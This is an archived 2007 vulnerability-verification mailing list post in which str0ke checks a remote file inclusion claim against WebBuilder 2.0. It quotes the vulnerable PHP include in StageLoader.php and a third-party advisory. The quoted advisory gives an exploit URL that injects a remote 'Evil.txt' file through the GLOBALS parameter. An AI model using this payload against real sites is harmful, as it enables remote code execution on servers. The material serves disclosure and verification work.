[VIM] true: WebBuilder <= 2.0 Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Thu Feb 1 14:52:41 EST 2007
The first line of code contains.
require_once($GLOBALS['core']['module_path'].'/module_common.php');
After looking at the www directory it contains an .htaccess file with
the following.
php_flag zlib.output_compression off
php_flag short_open_tag off
php_flag register_globals off
php_flag asp_tags off
php_flag magic_quotes_gpc off
php_flag magic_quotes_runtime off
I thought maybe the library directory wasn't supposed to be accessed
by http requests since there isn't an .htaccess file for it.
INSTALLATION notes:
To install the WebBuilder simply point your browser at www/index.php and enter
any requested information. This will setup your database and core configuration.
This shows accessing the library directory shouldn't be an issue.
/str0ke
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
WebBuilder <= Remote File Include Vulnerability
*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_ at W.Cn
*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
URL:
*
http://oss.backendmedia.com/snapshots/webbuilder2-2006-08-18.zip
*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
V.CODE: In : /library/StageLoader.php
*
require_once($GLOBALS['core']['module_path'].'/module_common.php');
*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Exploit:
*
http://victim.com/[path]/library/StageLoader.php?GLOBALS[core][module_path]=Evil.txt?
*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Thanx : Tryag.Com & DwRaT.Com & Asb-May.Net & Milw0rm.com & H4cky0u.Com &
Google.Com *
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
More information about the VIM
mailing list